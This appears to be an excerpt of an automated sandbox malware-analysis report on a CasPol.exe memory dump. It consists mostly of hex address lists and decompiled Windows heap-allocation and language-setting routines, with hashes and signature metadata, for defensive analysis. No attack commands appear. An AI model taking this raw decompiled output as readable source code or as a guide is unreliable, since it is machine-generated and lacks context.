                                                                0x0164a3c3
                                                                0x0164a33a
                                                                0x01691e17
                                                                0x01691e1b
                                                                0x01691e1d
                                                                0x01691e2f
                                                                0x01691e34
                                                                0x01691e36
                                                                0x01691e3c
                                                                0x01691e3c
                                                                0x01691e3c
                                                                0x01691e3c
                                                                0x01691e36
                                                                0x01691e42
                                                                0x01691e45
                                                                0x01691e47
                                                                0x0164a3f8
                                                                0x0164a3f8
                                                                0x0164a3fb
                                                                0x0164a3fd
                                                                0x01691e50
                                                                0x0164a403
                                                                0x0164a411
                                                                0x0164a411
                                                                0x0164a411
                                                                0x0164a41e
                                                                0x0164a420
                                                                0x0164a424
                                                                0x0164a427
                                                                0x0164a7c9
                                                                0x0164a7cd
                                                                0x0164a7d2
                                                                0x0164a7d9
                                                                0x0164a7e0
                                                                0x0164a7e3
                                                                0x0164a7ed
                                                                0x0164a7f3
                                                                0x0164a7f9
                                                                0x0164a7ff
                                                                0x0164a802
                                                                0x0164a807
                                                                0x0164a809
                                                                0x0164a809
                                                                0x0164a809
                                                                0x0164a80f
                                                                0x0164a80f
                                                                0x0164a812
                                                                0x0164a81c
                                                                0x0164a821
                                                                0x0164a824
                                                                0x0164a42d
                                                                0x0164a42d
                                                                0x0164a42d
                                                                0x0164a42d
                                                                0x0164a42d
                                                                0x0164a436
                                                                0x0164a43a
                                                                0x0164a609
                                                                0x0164a60d
                                                                0x0164a612
                                                                0x0164a616
                                                                0x0164a61a
                                                                0x01691e57
                                                                0x01691e59
                                                                0x00000000
                                                                0x00000000
                                                                0x01691e5f
                                                                0x0164a620
                                                                0x0164a627
                                                                0x01691e64
                                                                0x01691e66
                                                                0x01691e6c
                                                                0x01691e72
                                                                0x01691e76
                                                                0x01691e95
                                                                0x01691e9a
                                                                0x01691e78
                                                                0x01691e8d
                                                                0x01691e92
                                                                0x01691ea0
                                                                0x01691ea5
                                                                0x01691eaa
                                                                0x01691eb2
                                                                0x01691eb6
                                                                0x01691eb9
                                                                0x01691eb9
                                                                0x01691ebe
                                                                0x01691ec2
                                                                0x01691ec2
                                                                0x01691e66
                                                                0x0164a62d
                                                                0x0164a633
                                                                0x0164a636
                                                                0x0164a63a
                                                                0x0164a63c
                                                                0x0164a640
                                                                0x0164a642
                                                                0x0164a644
                                                                0x0164a644
                                                                0x0164a644
                                                                0x0164a64d
                                                                0x0164a64d
                                                                0x0164a651
                                                                0x0164a655
                                                                0x01691eca
                                                                0x01691ed1
                                                                0x00000000
                                                                0x00000000
                                                                0x01691ed7
                                                                0x00000000
                                                                0x0164a65b
                                                                0x0164a669
                                                                0x0164a66e
                                                                0x0164a670
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a676
                                                                0x0164a67b
                                                                0x0164a680
                                                                0x0164a682
                                                                0x01691f1a
                                                                0x0164a688
                                                                0x0164a688
                                                                0x0164a688
                                                                0x0164a68a
                                                                0x0164a68d
                                                                0x01691f24
                                                                0x01691f2a
                                                                0x01691f31
                                                                0x01691f43
                                                                0x01691f43
                                                                0x01691f31
                                                                0x0164a693
                                                                0x0164a697
                                                                0x0164a69d
                                                                0x0164a6a0
                                                                0x0164a6a6
                                                                0x0164a6a8
                                                                0x0164a6a8
                                                                0x0164a6a8
                                                                0x0164a6a8
                                                                0x0164a6b2
                                                                0x0164a6b7
                                                                0x0164a6c1
                                                                0x0164a6c6
                                                                0x0164a6d2
                                                                0x0164a6d9
                                                                0x0164a6e3
                                                                0x0164a6e6
                                                                0x0164a6eb
                                                                0x0164a6ed
                                                                0x0164a6ed
                                                                0x0164a6ed
                                                                0x0164a6ed
                                                                0x0164a6f3
                                                                0x0164a6f8
                                                                0x0164a702
                                                                0x0164a70a
                                                                0x0164a70e
                                                                0x0164a71a
                                                                0x0164a71e
                                                                0x01691fcb
                                                                0x01691fcf
                                                                0x01691fdd
                                                                0x01691fe3
                                                                0x01691fe3
                                                                0x0164a724
                                                                0x0164a728
                                                                0x0164a72a
                                                                0x0164a72d
                                                                0x0164a737
                                                                0x0164a73a
                                                                0x0164a73c
                                                                0x0164a742
                                                                0x0164a748
                                                                0x01691f4d
                                                                0x01691f50
                                                                0x01691f56
                                                                0x01691f5c
                                                                0x01691f5f
                                                                0x01691f7e
                                                                0x01691f83
                                                                0x01691f61
                                                                0x01691f76
                                                                0x01691f7b
                                                                0x01691f89
                                                                0x01691f8e
                                                                0x01691f93
                                                                0x01691f94
                                                                0x01691f9a
                                                                0x01691f9c
                                                                0x01691f9e
                                                                0x01691fa1
                                                                0x01691fa1
                                                                0x01691fa6
                                                                0x01691fa6
                                                                0x01691f50
                                                                0x0164a74e
                                                                0x0164a751
                                                                0x0164a754
                                                                0x0164a75d
                                                                0x0164a75e
                                                                0x0164a762
                                                                0x0164a767
                                                                0x01691faf
                                                                0x01691fb0
                                                                0x01691fb9
                                                                0x01691fbe
                                                                0x01691fc2
                                                                0x01691fc2
                                                                0x0164a76d
                                                                0x0164a76d
                                                                0x0164a775
                                                                0x0164a778
                                                                0x0164a77d
                                                                0x0164a77d
                                                                0x0164a71e
                                                                0x0164a782
                                                                0x0164a787
                                                                0x0164a789
                                                                0x01691ff3
                                                                0x0164a78f
                                                                0x0164a78f
                                                                0x0164a78f
                                                                0x0164a791
                                                                0x0164a794
                                                                0x01691ffd
                                                                0x01692006
                                                                0x0169200c
                                                                0x01692017
                                                                0x01692019
                                                                0x01692024
                                                                0x01692024
                                                                0x01692024
                                                                0x01692047
                                                                0x01692047
                                                                0x0169200c
                                                                0x0164a79a
                                                                0x0164a79f
                                                                0x0164a7a4
                                                                0x0164a7a9
                                                                0x0164a7ab
                                                                0x0169205a
                                                                0x0164a7b1
                                                                0x0164a7b1
                                                                0x0164a7b1
                                                                0x0164a7b3
                                                                0x0164a7b6
                                                                0x00000000
                                                                0x0164a7bc
                                                                0x01692066
                                                                0x01692068
                                                                0x01692073
                                                                0x01692073
                                                                0x01692073
                                                                0x01692078
                                                                0x01692079
                                                                0x0169207d
                                                                0x00000000
                                                                0x0169207d
                                                                0x0164a7b6
                                                                0x0164a440
                                                                0x0164a440
                                                                0x0164a440
                                                                0x0164a446
                                                                0x0164a44c
                                                                0x0164a44f
                                                                0x0164a453
                                                                0x0164a455
                                                                0x016920b3
                                                                0x016920b9
                                                                0x016920b9
                                                                0x0164a45d
                                                                0x0164a460
                                                                0x0164a464
                                                                0x0164a466
                                                                0x0164a46b
                                                                0x0164a46f
                                                                0x0164a471
                                                                0x0164a471
                                                                0x0164a471
                                                                0x0164a474
                                                                0x0164a479
                                                                0x0164a47d
                                                                0x0164a47f
                                                                0x01692229
                                                                0x0169222f
                                                                0x0164a3c8
                                                                0x0164a3c8
                                                                0x0164a3ca
                                                                0x0164a3ca
                                                                0x00000000
                                                                0x0164a3ca
                                                                0x01692235
                                                                0x0169223a
                                                                0x0169223a
                                                                0x00000000
                                                                0x00000000
                                                                0x01692240
                                                                0x01692246
                                                                0x0169224a
                                                                0x01692269
                                                                0x0169226e
                                                                0x0169224c
                                                                0x01692261
                                                                0x01692266
                                                                0x01692274
                                                                0x01692279
                                                                0x0169227e
                                                                0x01692286
                                                                0x01692288
                                                                0x0169228d
                                                                0x0169228d
                                                                0x01692292
                                                                0x01692292
                                                                0x01692295
                                                                0x01692295
                                                                0x00000000
                                                                0x01692295
                                                                0x0164a485
                                                                0x0164a489
                                                                0x0164a48b
                                                                0x0164a48f
                                                                0x0164a493
                                                                0x0164a497
                                                                0x0164a49b
                                                                0x0164a4bb
                                                                0x0164a4bb
                                                                0x0164a4bd
                                                                0x0164a4ff
                                                                0x0164a4ff
                                                                0x0164a501
                                                                0x0164a505
                                                                0x0164a50f
                                                                0x0164a517
                                                                0x0164a51b
                                                                0x0164a527
                                                                0x0164a52b
                                                                0x01692182
                                                                0x01692185
                                                                0x01692193
                                                                0x01692199
                                                                0x01692199
                                                                0x0164a531
                                                                0x0164a535
                                                                0x0164a538
                                                                0x0164a548
                                                                0x0164a54b
                                                                0x0164a54d
                                                                0x0164a553
                                                                0x0164a559
                                                                0x01692100
                                                                0x01692103
                                                                0x01692109
                                                                0x0169210f
                                                                0x01692112
                                                                0x01692131
                                                                0x01692136
                                                                0x01692114
                                                                0x01692129
                                                                0x0169212e
                                                                0x0169213c
                                                                0x01692141
                                                                0x01692147
                                                                0x0169214d
                                                                0x01692151
                                                                0x01692154
                                                                0x01692154
                                                                0x01692159
                                                                0x01692159
                                                                0x01692103
                                                                0x0164a55f
                                                                0x0164a562
                                                                0x0164a565
                                                                0x0164a567
                                                                0x01692162
                                                                0x0164a56d
                                                                0x0164a574
                                                                0x0164a575
                                                                0x0164a579
                                                                0x0164a57e
                                                                0x01692169
                                                                0x0169216a
                                                                0x01692170
                                                                0x01692175
                                                                0x01692179
                                                                0x01692179
                                                                0x0164a57e
                                                                0x0164a584
                                                                0x0164a58f
                                                                0x0164a58f
                                                                0x0164a52b
                                                                0x0164a5ad
                                                                0x0164a5bc
                                                                0x0164a5c1
                                                                0x0164a5c6
                                                                0x0164a5cb
                                                                0x0164a5cd
                                                                0x016921a9
                                                                0x0164a5d3
                                                                0x0164a5d3
                                                                0x0164a5d3
                                                                0x0164a5d5
                                                                0x0164a5d8
                                                                0x016921b3
                                                                0x016921bc
                                                                0x016921c2
                                                                0x016921cd
                                                                0x016921cf
                                                                0x016921da
                                                                0x016921da
                                                                0x016921da
                                                                0x016921f7
                                                                0x016921f7
                                                                0x016921c2
                                                                0x0164a5de
                                                                0x0164a5e3
                                                                0x0164a5e8
                                                                0x0164a5ea
                                                                0x0169220a
                                                                0x0164a5f0
                                                                0x0164a5f0
                                                                0x0164a5f0
                                                                0x0164a5f2
                                                                0x0164a5f5
                                                                0x01692219
                                                                0x0169221b
                                                                0x0169208c
                                                                0x0169208c
                                                                0x0169208c
                                                                0x01692095
                                                                0x01692096
                                                                0x01692097
                                                                0x01692098
                                                                0x016920a4
                                                                0x016920a5
                                                                0x016920a9
                                                                0x016920a9
                                                                0x00000000
                                                                0x0164a5f5
                                                                0x0164a4bf
                                                                0x0164a4d3
                                                                0x0164a4d8
                                                                0x0164a4da
                                                                0x01691ede
                                                                0x01691ede
                                                                0x01691ee4
                                                                0x01691ee9
                                                                0x00000000
                                                                0x00000000
                                                                0x01691f07
                                                                0x00000000
                                                                0x01691f07
                                                                0x0164a4e0
                                                                0x0164a4e5
                                                                0x0164a4e7
                                                                0x016920cb
                                                                0x0164a4ed
                                                                0x0164a4ed
                                                                0x0164a4ed
                                                                0x0164a4f2
                                                                0x0164a4f5
                                                                0x016920d5
                                                                0x016920de
                                                                0x016920e4
                                                                0x016920f6
                                                                0x016920f6
                                                                0x016920e4
                                                                0x0164a4fb
                                                                0x00000000
                                                                0x0164a4fb
                                                                0x0164a4a1
                                                                0x0164a4a4
                                                                0x0164a4a8
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a4aa
                                                                0x0164a4ac
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a4b2
                                                                0x0164a4b5
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a4b5
                                                                0x0164a43a
                                                                0x0164a340
                                                                0x0164a346
                                                                0x0164a600
                                                                0x00000000
                                                                0x0164a600
                                                                0x0164a34f
                                                                0x0164a351
                                                                0x0164a358
                                                                0x0164a3c6
                                                                0x00000000
                                                                0x0164a371
                                                                0x0164a37a
                                                                0x0164a37f
                                                                0x0164a382
                                                                0x0164a384
                                                                0x0164a394
                                                                0x00000000
                                                                0x0164a396
                                                                0x0164a399
                                                                0x0164a3a7
                                                                0x0164a3b0
                                                                0x0164a3b4
                                                                0x0164a3bb
                                                                0x0164a3d2
                                                                0x0164a3da
                                                                0x0164a3df
                                                                0x0164a3e1
                                                                0x0164a3e5
                                                                0x0164a3ea
                                                                0x0164a3f0
                                                                0x0164a3f0
                                                                0x0164a3e1
                                                                0x00000000
                                                                0x0164a3bb
                                                                0x0164a394

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-523794902
                                                                • Opcode ID: 6f555d18efe0a183ac37ce3301aa3c25c08c97ed996920cb854049b613eb3950
                                                                • Instruction ID: a58218d68883bb604f2bbf9ab8a1bdff1839293b13ab0011d1eb6539b736bb00
                                                                • Opcode Fuzzy Hash: 6f555d18efe0a183ac37ce3301aa3c25c08c97ed996920cb854049b613eb3950
                                                                • Instruction Fuzzy Hash: 74421031244742AFDB15CF68CC94B2ABBEAFF84214F14896DE586CB352D734D981CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E2D82 Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 64%
                                                                			E016E2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1700e80);
				E0167D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E016240E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E016E30C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E0162B150();
						} else {
							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E0162B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E0163EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E016E4496(_t181, 0);
						_t177 = L01644620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E016E49A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E016DFA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E01621F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E016516C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E016E4496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x1716360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x1716364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1716366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E016CD455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E0162B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E0162B150("Just allocated block at %p for %Ix bytes\n",  *0x1716360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x1716378 = 1;
									 *0x17160c0 = 0;
									asm("int3");
									 *0x1716378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x1715708; // 0x0
					 *0x171b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0167D130(0, _t177, _t181);
				}
			}





















                                                                0x016e2d82
                                                                0x016e2d84
                                                                0x016e2d89
                                                                0x016e2d8e
                                                                0x016e2d90
                                                                0x016e2d92
                                                                0x016e2d97
                                                                0x016e2d9a
                                                                0x016e2da4
                                                                0x016e2dc0
                                                                0x016e2dc3
                                                                0x016e2dd1
                                                                0x016e2dd6
                                                                0x016e2dd8
                                                                0x016e30a7
                                                                0x016e30a7
                                                                0x016e30aa
                                                                0x016e30aa
                                                                0x016e30ad
                                                                0x016e30b4
                                                                0x00000000
                                                                0x016e30b9
                                                                0x016e2de3
                                                                0x016e2de8
                                                                0x016e2deb
                                                                0x016e2dee
                                                                0x016e2df1
                                                                0x016e2df3
                                                                0x016e2dfb
                                                                0x016e2dfb
                                                                0x016e2df5
                                                                0x016e2df5
                                                                0x016e2df5
                                                                0x016e2e04
                                                                0x016e2e0a
                                                                0x016e2e0d
                                                                0x016e2e11
                                                                0x016e2e11
                                                                0x016e2e12
                                                                0x016e2e15
                                                                0x016e2e18
                                                                0x016e2e1a
                                                                0x016e3027
                                                                0x016e3027
                                                                0x016e302d
                                                                0x016e3030
                                                                0x016e304f
                                                                0x016e3054
                                                                0x016e3032
                                                                0x016e3047
                                                                0x016e304c
                                                                0x016e305a
                                                                0x016e3063
                                                                0x00000000
                                                                0x016e2e20
                                                                0x016e2e20
                                                                0x016e2e23
                                                                0x00000000
                                                                0x00000000
                                                                0x016e2e29
                                                                0x016e2e2b
                                                                0x016e2e47
                                                                0x016e2e2d
                                                                0x016e2e33
                                                                0x016e2e38
                                                                0x016e2e3f
                                                                0x016e2e42
                                                                0x016e2e42
                                                                0x016e2e4e
                                                                0x016e2e5d
                                                                0x016e2e5f
                                                                0x016e2e62
                                                                0x016e2e66
                                                                0x016e2e6b
                                                                0x016e2e6d
                                                                0x00000000
                                                                0x016e2e73
                                                                0x016e2e73
                                                                0x016e2e76
                                                                0x016e2e7a
                                                                0x016e2e83
                                                                0x016e2e83
                                                                0x016e2e83
                                                                0x016e2e85
                                                                0x016e2e87
                                                                0x016e2e8a
                                                                0x016e2e8d
                                                                0x016e2e92
                                                                0x016e2e9c
                                                                0x016e2e9f
                                                                0x016e2ea1
                                                                0x016e2ea2
                                                                0x016e2ea6
                                                                0x016e2ea6
                                                                0x016e2e9f
                                                                0x016e2eab
                                                                0x016e2eaf
                                                                0x016e2edf
                                                                0x016e2ee2
                                                                0x016e2ee5
                                                                0x016e2eb1
                                                                0x016e2eb3
                                                                0x016e2eb8
                                                                0x016e2ebd
                                                                0x016e2ec4
                                                                0x016e2ed6
                                                                0x016e2ec6
                                                                0x016e2ec7
                                                                0x016e2ecc
                                                                0x016e2ecf
                                                                0x016e2ed2
                                                                0x016e2ed2
                                                                0x016e2ed9
                                                                0x016e2ed9
                                                                0x016e2ee8
                                                                0x016e2eeb
                                                                0x016e2eef
                                                                0x016e2ef2
                                                                0x016e2efe
                                                                0x016e2f04
                                                                0x016e2f04
                                                                0x016e2f04
                                                                0x016e2f06
                                                                0x016e2f0d
                                                                0x016e2f0f
                                                                0x016e2f13
                                                                0x016e2f13
                                                                0x016e2f1b
                                                                0x016e2f21
                                                                0x016e2f27
                                                                0x016e2f95
                                                                0x016e2f98
                                                                0x016e2f9b
                                                                0x016e2fa0
                                                                0x00000000
                                                                0x00000000
                                                                0x016e2fa6
                                                                0x016e2fa9
                                                                0x016e2fac
                                                                0x00000000
                                                                0x00000000
                                                                0x016e2fb2
                                                                0x016e2fb9
                                                                0x00000000
                                                                0x00000000
                                                                0x016e2fc3
                                                                0x016e2fca
                                                                0x00000000
                                                                0x00000000
                                                                0x016e2fd0
                                                                0x016e2fd6
                                                                0x016e2fd9
                                                                0x016e2ff8
                                                                0x016e2ffd
                                                                0x016e2fdb
                                                                0x016e2ff0
                                                                0x016e2ff5
                                                                0x016e300e
                                                                0x016e300f
                                                                0x016e301a
                                                                0x00000000
                                                                0x016e2f29
                                                                0x016e2f29
                                                                0x016e2f2c
                                                                0x016e2f4b
                                                                0x016e2f50
                                                                0x016e2f2e
                                                                0x016e2f43
                                                                0x016e2f48
                                                                0x016e2f56
                                                                0x016e2f64
                                                                0x016e2f6c
                                                                0x016e2f6c
                                                                0x016e2f72
                                                                0x016e2f76
                                                                0x016e2f7c
                                                                0x016e2f83
                                                                0x016e2f89
                                                                0x016e2f8a
                                                                0x016e2f8a
                                                                0x00000000
                                                                0x016e2f76
                                                                0x016e2f27
                                                                0x016e2e6d
                                                                0x016e2da6
                                                                0x016e2dab
                                                                0x016e2db3
                                                                0x016e2db9
                                                                0x016e30bc
                                                                0x016e30c1
                                                                0x016e30c1

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                • API String ID: 0-1745908468
                                                                • Opcode ID: 8b5542c3e36e2f6cf28d481346079a72588a7f2152a66c4f39843187869ea29d
                                                                • Instruction ID: 5e4a8988300ccab08feed0086c2caef76e05b8b24dd72e6c60a84f629369f680
                                                                • Opcode Fuzzy Hash: 8b5542c3e36e2f6cf28d481346079a72588a7f2152a66c4f39843187869ea29d
                                                                • Instruction Fuzzy Hash: 5E911F31602641DFDB26DFA8CC58AADBFF2FF49610F18815CE5465B391C7329882CB08
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01633D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 96%
                                                                			E01633D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01631B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01631B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01631B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01631B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01631B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01644620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0166F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01671370(_t276, 0x1604e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0166BB40(0,  &_v68, _t170);
									if(L016343C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
